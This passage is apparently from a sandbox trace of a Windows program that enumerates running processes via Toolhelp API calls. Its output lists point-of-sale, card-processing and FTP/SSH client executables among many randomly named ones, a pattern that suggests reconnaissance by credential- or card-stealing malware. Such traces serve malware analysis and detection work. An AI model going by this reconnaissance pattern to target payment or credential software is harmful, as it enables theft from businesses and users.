th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0273.184] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0273.186] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0273.189] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0273.192] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0273.195] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0273.197] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0273.201] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0273.203] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0273.206] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0273.208] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0273.210] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0273.212] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0273.279] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0273.281] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0273.283] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0273.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0273.286] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0273.288] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0273.289] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0273.291] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0273.318] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0273.320] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.322] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.332] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.334] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0273.335] CloseHandle (hObject=0x1d14) returned 1 [0273.336] Sleep (dwMilliseconds=0x64) [0273.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0273.462] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.464] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.472] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.474] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.482] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.484] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.485] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.486] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.488] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.489] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.492] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.547] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.549] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0273.550] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0273.552] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.553] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.555] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0273.556] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0273.560] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0273.562] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0273.563] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.565] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0273.567] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0273.568] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.570] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0273.571] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0273.573] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0273.577] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0273.578] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0273.580] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0273.581] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0273.582] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0273.584] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0273.586] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0273.587] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0273.630] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0273.633] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0273.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0273.640] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0273.642] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0273.644] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0273.646] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0273.648] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0273.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0273.657] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0273.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0273.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0273.663] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0273.665] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0273.670] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0273.672] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: 